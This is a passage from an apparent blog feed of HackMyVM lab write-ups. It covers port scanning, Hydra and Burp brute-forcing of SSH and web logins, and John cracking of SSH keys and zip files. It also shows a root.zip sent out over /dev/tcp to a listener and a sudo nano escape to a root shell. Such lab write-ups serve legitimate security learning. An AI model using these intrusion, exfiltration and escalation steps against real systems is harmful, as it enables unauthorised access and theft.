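    not exercised by the sample). Without an Accept header asking for schema 2
    the registry answers with the schema-1 manifest handled here."""
    url = "{}/v2/{}/manifests/{}".format(registry, repo, tag)
    with urllib.request.urlopen(url, timeout=10) as resp:
        return json.load(resp)


def layer_digests(manifest):
    """Unique blob digests worth pulling, top layer first, empty layers skipped."""
    seen = []
    for layer in manifest.get("fsLayers", []):
        digest = layer.get("blobSum")
        if digest and digest != EMPTY_LAYER and digest not in seen:
            seen.append(digest)
    return seen


def blob_urls(registry, repo, manifest):
    """Download URLs in the form the recon above fed to curl -o blob1.tar."""
    return ["{}/v2/{}/blobs/{}".format(registry, repo, d) for d in layer_digests(manifest)]


def _v1_entries(manifest):
    """Each history[].v1Compatibility value is a JSON document stored as a string."""
    for entry in manifest.get("history", []):
        yield json.loads(entry["v1Compatibility"])


def build_history(manifest):
    """(created, command) for every build step, oldest last as the registry orders them."""
    steps = []
    for v1 in _v1_entries(manifest):
        cmd = " ".join(v1.get("container_config", {}).get("Cmd") or [])
        steps.append((v1.get("created", ""), cmd))
    return steps


def leaked_secrets(manifest):
    """(kind, name, value) for ARG/ENV build steps and config.Env entries whose
    name matches SENSITIVE. Build args are not supposed to persist, but the
    schema-1 history records the step that set them."""
    found = []
    for v1 in _v1_entries(manifest):
        cmd = " ".join(v1.get("container_config", {}).get("Cmd") or [])
        for kind, name, value in ARG_OR_ENV.findall(cmd):
            if SENSITIVE.search(name):
                found.append((kind, name, value))
        for item in v1.get("config", {}).get("Env") or []:
            name, sep, value = item.partition("=")
            if sep and SENSITIVE.search(name):
                found.append(("ENV", name, value))
    return found


if __name__ == "__main__":
    registry = "http://192.168.72.129:1007"
    for url in blob_urls(registry, "dolly", SAMPLE_MANIFEST):
        print("layer:", url)
    for created, cmd in build_history(SAMPLE_MANIFEST):
        print(created, cmd)
    print("leaked:", leaked_secrets(SAMPLE_MANIFEST))
```

Against the real manifest this reports two distinct layers to fetch (the two `a3ed95...` entries are the empty-layer placeholder) and the `ARG passwd=devilcollectsit` step; the writeup goes on to pull the first blob, which is where `/etc/shadow` and bela's `id_rsa` come from. The zero-byte `.wh..wh..opq` file in that layer's `/home/bela` is the overlay "opaque directory" whiteout marker, not data.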

That saves a step: no need to crack the shadow hash at all.

```
┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh]
└─$ ssh2john id_rsa &gt; hash
                                         
┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash 
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:01:24 0.05% (ETA: 2025-01-31 17:41) 0g/s 105.4p/s 105.4c/s 105.4C/s passat..kicker
0g 0:00:01:39 0.06% (ETA: 2025-01-31 17:26) 0g/s 105.9p/s 105.9c/s 105.9C/s strokes..jhoan

```

It won't crack; surely it's not this one?

![image](assets/image-20250129204242-qkg0s6r.png)

Let's try it

```
┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh]
└─$ chmod 600 id_rsa 

┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh]
└─$ ssh bela@192.168.72.129 -i id_rsa
ssh: connect to host 192.168.72.129 port 22: No route to host
                                                                                                                                     
┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh]
└─$ ssh bela@192.168.72.129 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux doll 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 25 10:35:13 2023 from 192.168.0.100
bela@doll:~$ id
uid=1000(bela) gid=1000(bela) grupos=1000(bela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

```

# 3. Privilege Escalation

```
bela@doll:~$ sudo -l
Matching Defaults entries for bela on doll:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bela may run the following commands on doll:
    (ALL) NOPASSWD: /usr/bin/fzf --listen\=1337

```

`fzf` is an interactive command-line fuzzy finder, and its `--listen` option lets it accept commands over a remote connection.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Doll.html</guid><pubDate>Thu, 20 Mar 2025 08:04:37 +0000</pubDate></item><item><title>hmv_Deeper</title><link>https://7r1UMPH.github.io/post/hmv_Deeper.html</link><description># hmv_Deeper

# 0. Overview

**Target machine**: [hackmyvm - Deeper](https://hackmyvm.eu/machines/machine.php?vm=Deeper)
**Difficulty**: green
**Target IP**: 192.168.205.143
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 16:34 CST
Nmap scan report for 192.168.205.143
Host is up (0.00046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:49:23:DF (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds
```

# 2. Footprinting

![Image](https://github.com/user-attachments/assets/91ecf9bd-ad4e-46cc-a738-92bfc7524a8b)

Add this:

![Image](https://github.com/user-attachments/assets/a2ee96a4-dce7-48ce-b94c-68125e7b3459)

![Image](https://github.com/user-attachments/assets/f7e4d481-8c35-47be-ba4d-88c63577b3c6)

![Image](https://github.com/user-attachments/assets/6ca74cb9-75f8-49fe-8abb-fb13d0bd5c02)

Decode it ([cyberchef](https://cyberchef.org/)):

![Image](https://github.com/user-attachments/assets/5a25d1be-e84d-4793-948c-0a3678f8ceaa)

![Image](https://github.com/user-attachments/assets/c68825cd-5fbd-459d-aed3-0a45900572b1)

# 3. Privilege escalation

```bash
┌──(kali㉿kali)-[~/test]
└─$ ssh alice@192.168.205.143                                             
The authenticity of host '192.168.205.143 (192.168.205.143)' can't be established.
ED25519 key fingerprint is SHA256:LsWOF4O2aDb/w6V7Z5VEAcjNfkxMmPOzyEIC7HMr91o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.205.143' (ED25519) to the list of known hosts.
alice@192.168.205.143's password: 
Linux deeper 6.1.0-11-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-4 (2023-08-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 26 00:38:16 2023 from 192.168.100.103
alice@deeper:~$ id
uid=1000(alice) gid=1000(alice) groups=1000(alice)
alice@deeper:~$ sudo -l
[sudo] password for alice: 
Sorry, user alice may not run sudo on deeper.
alice@deeper:~$ ls -la
total 32
drwxr--r-- 3 alice alice 4096 Aug 26  2023 .
drwxr-xr-x 4 root  root  4096 Aug 25  2023 ..
lrwxrwxrwx 1 alice alice    9 Aug 25  2023 .bash_history -&gt; /dev/null
-rw-r--r-- 1 alice alice  220 Aug 25  2023 .bash_logout
-rw-r--r-- 1 alice alice 3526 Aug 25  2023 .bashrc
-rw-r--r-- 1 alice alice   41 Aug 25  2023 .bob.txt
drwxr-xr-x 3 alice alice 4096 Aug 26  2023 .local
-rw-r--r-- 1 alice alice  807 Aug 25  2023 .profile
-rw-r--r-- 1 alice alice   33 Aug 26  2023 user.txt
alice@deeper:~$ cat .bob.txt
535746745247566c634556756233566e61413d3d

```

![Image](https://github.com/user-attachments/assets/6cba623b-f063-4b85-93e5-72e751571700)

```bash
alice@deeper:/home$ su - bob
Password: 
bob@deeper:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob)
bob@deeper:~$ sudo -l
[sudo] password for bob: 
Sorry, user bob may not run sudo on deeper.
bob@deeper:~$ ls -la
total 28
drwxr--r-- 3 bob  bob  4096 Aug 26  2023 .
drwxr-xr-x 4 root root 4096 Aug 25  2023 ..
lrwxrwxrwx 1 bob  bob     9 Aug 25  2023 .bash_history -&gt; /dev/null
-rw-r--r-- 1 bob  bob   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 bob  bob  3526 Apr 23  2023 .bashrc
drwxr-xr-x 3 bob  bob  4096 Aug 25  2023 .local
-rw-r--r-- 1 bob  bob   807 Aug 25  2023 .profile
-rw-r--r-- 1 bob  bob   215 Aug 26  2023 root.zip
bob@deeper:~$ cat root.zip &gt; /dev/tcp/192.168.205.141/7777

#kali
┌──(kali㉿kali)-[~/test/tmp]
└─$ nc -lvnp 7777 &gt; root.zip 
listening on [any] 7777 ...
connect to [192.168.205.141] from (UNKNOWN) [192.168.205.143] 40706
                                                 
┌──(kali㉿kali)-[~/test/tmp]
└─$ zip2john root.zip &gt; hash                          
ver 1.0 efh 5455 efh 7875 root.zip/root.txt PKZIP Encr: 2b chk, TS_chk, cmplen=33, decmplen=21, crc=2D649941 ts=BA81 cs=ba81 type=0
                                                                                                                                   
┌──(kali㉿kali)-[~/test/tmp]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
                                                                                                                                   
┌──(kali㉿kali)-[~/test/tmp]
└─$ john --show hash                                  
root.zip/root.txt:bob:root.txt:root.zip::root.zip

1 password hash cracked, 0 left                                              
                                 
┌──(kali㉿kali)-[~/test/tmp]
└─$ unzip root.zip
Archive:  root.zip
[root.zip] root.txt password: 
 extracting: root.txt                                                                                                                                               
                                                                                                                                 
┌──(kali㉿kali)-[~/test/tmp]
└─$ cat root.txt
root:IhateMyPassword
                                
```

Log in as root:

```bash
bob@deeper:~$ su -
Password: 
root@deeper:~# id
uid=0(root) gid=0(root) groups=0(root)

```</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Deeper.html</guid><pubDate>Thu, 20 Mar 2025 08:03:36 +0000</pubDate></item><item><title>hmv_Darkside</title><link>https://7r1UMPH.github.io/post/hmv_Darkside.html</link><description># hmv_Darkside

# 0. Overview

**Target machine**: [hackmyvm - Darkside](https://hackmyvm.eu/machines/machine.php?vm=Darkside)
**Difficulty**: green
**Target IP**: 192.168.205.134
**Local IP**: 192.168.205.141

# 1. Scanning

Contestant number one, `nmap`, starts the scan:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.134
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-14 10:42 CST
Nmap scan report for 192.168.205.134
Host is up (0.00078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:2D:1C:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.69 seconds                                                 
```

Look at the **HTTP service** port first; brute-force the **SSH port** only if that leads nowhere.

# 2. Footprinting

![image](https://github.com/user-attachments/assets/8432290e-d5d9-4863-9dfc-a43e9145b860)

It's a login page. `SQL injection, universal-password bypass strings, weak passwords` all led nowhere, so run a web vulnerability scan with `Nikto`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nikto -h 192.168.205.134                       
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.205.134
+ Target Hostname:    192.168.205.134
+ Target Port:        80
+ Start Time:         2025-01-14 10:43:28 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.56 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /backup/: Directory indexing found.
+ /backup/: This might be interesting.
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2025-01-14 10:43:50 (GMT8) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

There's a backup directory; let's look at it in the browser.

![image](https://github.com/user-attachments/assets/8432290e-d5d9-4863-9dfc-a43e9145b860)

There's only a `vote.txt` text file, which gives us a few usernames; we use them to try brute-forcing the SSH service.

```bash
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.205.134/backup/vote.txt|awk -F ':' '{print $1}'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   205  100   205    0     0  69751      0 --:--:-- --:--:-- --:--:--  100k
rijaba
xerosec
sml
cromiphi
gatogamer
chema
talleyrand
d3b0o

Since the result was a draw, we will let you enter the darkside, or at least temporarily, good luck kevin.
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ vim user  
                                      
┌──(kali㉿kali)-[~/test]
└─$ cat user
rijaba
xerosec
sml
cromiphi
gatogamer
chema
talleyrand
d3b0o
kevin
                  
┌──(kali㉿kali)-[~/test]
└─$ hydra -L user -P /usr/share/wordlists/q5000.txt ssh://192.168.205.134 -I -u -f -e nsr -t 64 

Hydra v9.5 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-14 11:04:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 45027 login tries (l:9/p:5003), ~704 tries per task
[DATA] attacking ssh://192.168.205.134:22/

```

While that runs, we also brute-force the login page with Burp.

![image](https://github.com/user-attachments/assets/b8ec81f2-f037-4bec-a27e-335aee5329d9)

Choose this one, set the parameters, and start the attack.

![image](https://github.com/user-attachments/assets/f4a491ef-5970-4991-b5e2-83ae8de8d3c7)

Sorting by length, one username/password pair has a clearly different response length; try logging in with it.

![image](https://github.com/user-attachments/assets/c0b9156f-bbb0-475f-920a-7ed966e0a230)

We get a string that looks like base64; decode it with [cyberchef](https://cyberchef.org/).

![image](https://github.com/user-attachments/assets/c0b9156f-bbb0-475f-920a-7ed966e0a230)

(Embarrassing: it's base58.) The output is a string that looks like a URL path; let's visit it.

![image](https://github.com/user-attachments/assets/1b02d153-2df9-4f83-a249-714cf8196a93)

It asks which side we choose; let's look at the source.

![image](https://github.com/user-attachments/assets/fe152899-e95a-4487-a6a3-69c1bdc75f10)

The code checks whether a **cookie** named **side** exists with the value `darkside`; if so, the script redirects the user to the URL `hwvhysntovtanj.password`. I can't be bothered to change the **cookie**, so let's just visit it directly.

![image](https://github.com/user-attachments/assets/9bc27d36-69e8-4d83-a178-f695a8e598ce)

We get what looks like an **SSH** password; let's try it.

```bash
┌──(kali㉿kali)-[~/test]
└─$ ssh kevin@192.168.205.134  
The authenticity of host '192.168.205.134 (192.168.205.134)' can't be established.
ED25519 key fingerprint is SHA256:pmPw9d2/o54jN+Dmo29Hq6rIzWOQ//VhyZvK4KN6rmk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.205.134' (ED25519) to the list of known hosts.
kevin@192.168.205.134's password: 
Linux darkside 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 15 15:18:15 2023 from 10.0.2.18
kevin@darkside:~$ id
uid=1000(kevin) gid=1000(kevin) groups=1000(kevin)
```

Connected successfully.

# 3. Privilege escalation

```bash
kevin@darkside:~$ sudo -l
[sudo] password for kevin: 
Sorry, user kevin may not run sudo on darkside.
kevin@darkside:~$ 
kevin@darkside:~$ ls -la
total 32
drwxr-xr-x 3 kevin kevin 4096 Oct 30  2023 .
drwxr-xr-x 4 root  root  4096 Oct 15  2023 ..
lrwxrwxrwx 1 kevin kevin    9 Oct 30  2023 .bash_history -&gt; /dev/null
-rw-r--r-- 1 kevin kevin  220 Oct 15  2023 .bash_logout
-rw-r--r-- 1 kevin kevin 3526 Oct 15  2023 .bashrc
-rw-r--r-- 1 kevin kevin  113 Oct 15  2023 .history
drwxr-xr-x 3 kevin kevin 4096 Oct 15  2023 .local
-rw-r--r-- 1 kevin kevin  807 Oct 15  2023 .profile
-rw-r--r-- 1 kevin kevin   19 Oct 15  2023 user.txt
kevin@darkside:~$ cat .history
ls -al
hostname -I
echo 'Congratulations on the OSCP Xerosec'
top
ps -faux
su rijaba
ILoveJabita
ls /home/rijaba

```

A `.history` text file in the home directory reveals `rijaba`'s password; try logging in.

```bash
kevin@darkside:~$ su rijaba
Password: 
rijaba@darkside:/home/kevin$ id
uid=1001(rijaba) gid=1001(rijaba) groups=1001(rijaba)
```

Continue checking for privilege escalation:

```bash
rijaba@darkside:/home/kevin$ sudo -l
Matching Defaults entries for rijaba on darkside:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rijaba may run the following commands on darkside:
    (root) NOPASSWD: /usr/bin/nano

```

`nano` can be run as **root**, so we escalate:

```bash
rijaba@darkside:/home/kevin$ sudo /usr/bin/nano
```

![image](https://github.com/user-attachments/assets/68590d1b-033a-440d-8aea-5eff83ad1d78)

Inside `nano`, press **CTRL+R**, then **CTRL+X**, enter `reset; sh 1&gt;&amp;0 2&gt;&amp;0`, and the escalation succeeds.

![image](https://github.com/user-attachments/assets/68590d1b-033a-440d-8aea-5eff83ad1d78)</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Darkside.html</guid><pubDate>Thu, 20 Mar 2025 08:02:34 +0000</pubDate></item><item><title>hmv_crack</title><link>https://7r1UMPH.github.io/post/hmv_crack.html</link><description># hmv_crack

# 0. Overview

**Target machine**: [hackmyvm - crack](https://hackmyvm.eu/machines/machine.php?vm=crack)
**Difficulty**: green
**Target IP**: 192.168.205.143
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.143
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 15:51 CST
Nmap scan report for 192.168.205.143
Host is up (0.00043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
4200/tcp  open  vrml-multi-use
12359/tcp open  unknown
MAC Address: 08:00:27:75:33:75 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds

```

We don't know what ports `4200` and `12359` are, so look at the **FTP** port first.

# 2. Footprinting

```bash
┌──(kali㉿kali)-[~/test]
└─$ ftp 192.168.205.143                         
Connected to 192.168.205.143.
220 (vsFTPd 3.0.3)
Name (192.168.205.143:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; ls
229 Entering Extended Passive Mode (|||50526|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Jun 07  2023 upload
226 Directory send OK.
ftp&gt; cd upload
250 Directory successfully changed.
ftp&gt; ls
229 Entering Extended Passive Mode (|||30618|)
150 Here comes the directory listing.
-rwxr-xr-x    1 1000     1000          849 Jun 07  2023 crack.py
226 Directory send OK.
ftp&gt; mget crack.py
mget crack.py [anpqy?]? y
229 Entering Extended Passive Mode (|||35830|)
150 Opening BINARY mode data connection for crack.py (849 bytes).
100% |*****************************************************************************************|   849        1.71 MiB/s    00:00 ETA
226 Transfer complete.
849 bytes received in 00:00 (799.51 KiB/s)
ftp&gt; exit
221 Goodbye.
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ cat crack.py  
import os
import socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

c, addr = s.accept()
no = 'NO'
while True:
        try:
                c.send('File to read:'.encode())
                data = c.recv(1024)
                file = (str(data, 'utf-8').strip())
                filename = os.path.basename(file)
                check = '/srv/ftp/upload/'+filename
                if os.path.isfile(check) and os.path.isfile(file):
                        f = open(file,'r')
                        lines = f.readlines()
                        lines = str(lines)
                        lines = lines.encode()
                        c.send(lines)
                else:
                        c.send(no.encode())
        except ConnectionResetError:
                pass

```

This is the script that runs on port `12359`; it implements a file-read service.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_crack.html</guid><pubDate>Thu, 20 Mar 2025 08:01:32 +0000</pubDate></item><item><title>hmv_CodeShield</title><link>https://7r1UMPH.github.io/post/hmv_CodeShield.html</link><description># hmv_CodeShield

# 0. Overview

**Target machine**: [hackmyvm - CodeShield](https://hackmyvm.eu/machines/machine.php?vm=CodeShield)
**Difficulty**: green
**Target IP**: 192.168.205.138
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn -sV 192.168.205.138
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-20 10:33 CST
Nmap scan report for 192.168.205.138
Host is up (0.046s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           vsftpd 3.0.5
80/tcp    open  http          nginx
110/tcp   open  pop3          Dovecot pop3d
143/tcp   open  imap          Dovecot imapd (Ubuntu)
443/tcp   open  ssl/http      nginx
993/tcp   open  imaps?
995/tcp   open  pop3s?
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
22222/tcp open  ssh           OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:61:49:1F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.22 seconds
```

First pick out the ports of interest: `21, 80, 443, 22222`. Just these for now; we'll pick more later if we get stuck.

# 2. Footprinting

I prefer to look at FTP on port 21 first.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_CodeShield.html</guid><pubDate>Thu, 20 Mar 2025 08:00:30 +0000</pubDate></item><item><title>hmv_Chromatica</title><link>https://7r1UMPH.github.io/post/hmv_Chromatica.html</link><description># hmv_Chromatica

**Target machine**: https://hackmyvm.eu/machines/machine.php?vm=Chromatica
**Difficulty**: green
**Target IP**: 192.168.205.215
**Local IP**: 192.168.205.141

---

### **1. Port enumeration and service detection**

First, scan the target IP for open ports with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.215
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 14:18 CST
Nmap scan report for 192.168.205.215
Host is up (0.0017s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
5353/tcp open  domain  dnsmasq 2.86
MAC Address: 08:00:27:95:39:FD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.66 seconds
```

The scan shows that the target has ports 22 (SSH), 80 (HTTP) and 5353 (DNS) open.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_Chromatica.html</guid><pubDate>Thu, 20 Mar 2025 07:59:27 +0000</pubDate></item><item><title>hmv_canto</title><link>https://7r1UMPH.github.io/post/hmv_canto.html</link><description># hmv_canto

**Target machine**: https://hackmyvm.eu/machines/machine.php?vm=canto
**Difficulty**: green
**Target IP**: 192.168.205.213
**Local IP**: 192.168.205.141

---

### **1. Port enumeration and service detection**

First, scan the target IP for open ports with `nmap`:

```bash
┌──(kali㉿kali)-[~]
└─$ nmap -sV -sT -O -Pn -n -p- 192.168.205.213
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 19:05 CST
Nmap scan report for 192.168.205.213
Host is up (0.00026s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.57 ((Ubuntu))
MAC Address: 08:00:27:80:A9:92 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.13 seconds

```

The scan shows that the target has ports 22 (SSH) and 80 (HTTP) open.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_canto.html</guid><pubDate>Thu, 20 Mar 2025 07:58:25 +0000</pubDate></item><item><title>hmv_buster</title><link>https://7r1UMPH.github.io/post/hmv_buster.html</link><description># hmv_buster

# 0. Overview

**Target machine**: [hackmyvm - buster](https://hackmyvm.eu/machines/machine.php?vm=buster)
**Difficulty**: green
**Target IP**: 192.168.205.142
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.142
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-15 20:11 CST
Nmap scan report for 192.168.205.142
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:09:D8:74 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds

```

Look at **port 80** first; **port 22** is the fallback.

# 2. Footprinting

![image](https://github.com/user-attachments/assets/9eb492e1-d1d8-4170-bb5f-990d1792265b)

It's a **WordPress** site; scan it with **wpscan**:

```bash
┌──(kali㉿kali)-[~/test]
└─$ wpscan --url http://192.168.205.142/ -e vp,u --api-token xxx   # register on the wpscan site to get an api-token
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.27
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.205.142/ [192.168.205.142]
[+] Started: Wed Jan 15 20:13:50 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.14.2
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.205.142/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.205.142/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.205.142/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.205.142/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.7.1 identified (Latest, released on 2024-11-21).
 | Found By: Meta Generator (Passive Detection)
 |  - http://192.168.205.142/, Match: 'WordPress 6.7.1'
 | Confirmed By: Rss Generator (Aggressive Detection)
